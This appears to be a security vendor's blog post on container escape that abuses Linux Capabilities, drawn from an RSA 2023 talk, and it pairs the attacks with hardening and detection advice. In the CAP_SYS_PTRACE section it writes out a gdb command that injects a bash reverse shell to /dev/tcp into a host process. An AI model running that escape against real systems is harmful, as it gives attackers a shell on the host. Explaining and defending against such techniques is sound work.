An Insight into RSA 2023: Capabilities Utilization for Container Escape

June 23, 2023 | NSFOCUS

At the RSA Conference this year, researchers from Cyberason shared the topic of Container Escape: All You Need Is Cap (Capabilities), detailing three methods of using Cap permissions for container escape, hoping to make users pay attention to the permission allocation of Capabilities when using containers and maintain best practices. This article will provide a detailed introduction to the technical principles of Capabilities Utilization for container Escape, one of the security risks and threats of containerized infrastructure.

I. Capabilities Utilization

Introduction to Capabilities

The Capabilities mechanism was introduced after version 2.2 of the Linux kernel. It is designed to divide and control the root permissions in a more granular way and achieve on-demand authorization. Common Capabilities information can be found on the Linux manual page [1], with some examples shown in Figure 1:

Figure 1 Capabilities Permissions and System Calls

Most Capabilities have atomic capabilities with a limited number of system calls, but there are also some Capabilities with excessively high permissions, such as CAP_ SYS_ ADMIN:

Figure 2 CAP_ SYS_ ADMIN Details

As shown in Figure 2, the official information also indicates the risk of permission “overload”, which was analyzed by researchers as early as the article “CAP_SYS_ADMIN: the new root” ^[2]. CAP_ SYS_ ADMIN not only allows the execution of system calls such as mount, umount, and quotacrl, but also includes permissions for other Capabilities, such as CAP_ PERFMON, CAP_ BPF and CAP_ RESTORE_ CHECKPOINT et al.

Capabilities Discovery

By default, the Docker container has the Capabilities shown in Figure 3:

Figure 3: Default Capabilities in Docker V20.10.7

You can also proactively assign specified Capabilities when starting a container based on business needs, in the following ways:

1) Add specified Capability:

docker run — cap add=- it

2) Add all Capabilities:

docker run — cap add=ALL – it

3) Delete specified Capability:

Docker run — cap drop=- it

4) Delete all Capabilities:

Docker run — cap drop=ALL – it

In Kubernetes, it can be configured through the securityContext field:

Figure 4 SecurityContext Configuration in Kubernetes

In actual container environment attack and defense scenarios, this permission can be viewed through the cat/proc/1/status command, as shown in Figure 5:

Figure 5 Capabilities Discovery

The values of Capabilities are displayed in the form of BITMASK. For ease of viewing, it is necessary to use the capsh –decode=CAP BITMASK command (most container environments do not have the capsh tool installed) for decoding, as shown in Figure 6:

Figure 6 CAP BITMASK Decoding

Utilizing CAP_SYS_ Module for Container Escape

The CAP_ SYS_ MODULE permission allows for the installation and uninstallation of kernel modules, as shown in Figure 7:

Figure 7 Details of CAP_ SYS_ MODULE

When the container is granted this permission, attackers can install custom modules inside the container. One way is to upload compiled kernel modules, but due to differences between kernel versions, pre-compiled modules may not be universal, but they can be compiled by simulating and targeting the same environment locally; Another way is to directly compile in the target container environment, and the specific usage method can be referred to in “Abusing CAP_SYS-MODULE to Cause Container Escape”^[3]. The general principle is shown in Figure 8:

Figure 8 Attack process for installing kernel modules

Utilizing CAP_ SYS_ PTRACE for Container Escape

Figure 9 Details of CAP_SYS_PTRACE

When a container is assigned a CAP_SYS_PTRACE permission, this permission allows for the use of ptrace system calls.

The ptrace() system call is one of the inter process communication mechanisms provided by Linux systems. Its main function is to allow one process (called a tracer process) to monitor and control another process (called a tracer process). The tracer process can read and write registers and memory of the tracee process, and control the execution of the tracee process, such as single step execution, interrupt execution, etc. The ptrace() system call is typically used to implement debugger tools, such as GDB, for debugging applications, tracking the cause of program crashes, or generating dump files when the application crashes. Ptrace () can also be used to implement Code injection and other advanced debugging techniques. When the container shares the host’s pid namespace, it can escape the container through process injection.

The following will introduce two methods of using the ptrace() system to call for escape.

1) Process Debugging

The attack principle of process debugging is shown in Figure 10:

Figure 10 Using Process Debugging for Container Escape

The prerequisite for the use of this technique:

CAP_SYS_PTRACE
AppArmor is configured as Unconfined
Shared host pid namespace

Query the Process identifier running on the host in the container, and then use the gdb command to debug the command execution:

gdb – p PID

call (void) system (“bash – c’bash – i>&/dev/tcp//0>&1 ‘”)

2) Shellcode injection

The attack principle of Shellcode injection is shown in Figure 11:

Figure 11 Shellcode injection for escape

The prerequisite for using this technique:

CAP_SYS_PTRACE
AppArmor is configured as Unconfined
Shared host pid namespace

After querying the host Process identifier, execute the injection code^[4]:

Figure 12 Shellcode Injection Process

II. Defense and Detection

For containers in real businesses, the allocation of Capabilities is not always strictly restricted. Most open-source applications are often granted higher Capabilities permissions when deployed in a containerized manner, as shown in Figure 13:

Figure 13 Parameter Details of Container Deployment for Open Source Projects

So, how can an enterprise defend and detect such threats? The following are the best practices and some detection ideas for container use.

Best Practices for Container Usage

When creating a container, drop the existing Capabilities first, and then manually add them through the – cap-add method to ensure the reasonable use of Capabilities
Try to avoid using privileged containers and avoid using CAP_SYS_ADMIN function.
Running container-based businesses as a non-root user
Configure the AllowPrivilegeEscalation flag to disable privilege escalation
Improve Seccomp policy^[5] to limit the execution of malicious system calls
Improve the AppArmor policy to restrict access to system resources

Detection Ideas

Monitor container resources running with suspicious or unknown images
Monitor suspicious system calls initiated from within the container, such as init_Module, ptrace, etc
Monitoring suspicious processes generated on containers or hosts

III. Conclusion

This article mainly introduces the relevant techniques for container escape using Capabilities permissions. Unlike vulnerability exploitation, the utilization of such insecure configurations is simpler and more practical. The reason is that enterprise users may promptly fix cloud-native infrastructure within the scope of vulnerability impact, upgrade versions, or use patches based on the latest vulnerability notifications when using container environments, but often overlook the risk of improper configuration. Security mechanisms such as Capabilities, Seccomp, and Apparmor require reasonable configuration by humans. However, due to various factors including unskilled staff, lack of security awareness, and lack of practices, it is difficult for humans to achieve best practices during configuration. How to ensure the best practices for secure cloud native environments has become a problem that enterprises need to consider and solve.

NSFOCUS Cloud Native Security Platform (CNSP), based on the CIS Docker Benchmarks^[6] and CIS Kubernetes Benchmarks, has implemented compliance detection capabilities for containers, runtime, orchestration systems, and file orchestration. It can timely identify and consolidate unsafe configurations in the cloud-native environment, helping users build a secure cloud-native environment:

NSFOCUS CNSP also supports security detection capabilities for cloud-native environments, covering behaviors and activities on hosts and containers, including container escape, rebound shells, container authorization, malicious command execution, backdoor deployment, lateral movement, and other types of attack behaviors.

References

[1] https://man7.org/linux/man-pages/man7/capabilities.7.html

[2] https://lwn.net/Articles/486306/

[3] https://github.com/Metarget/metarget/tree/master/writeups_cnv/config-cap_sys_module-container

[4] https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c

[5] https://github.com/moby/moby/blob/master/profiles/seccomp/default.json

[6] https://www.cisecurity.org/benchmark/docker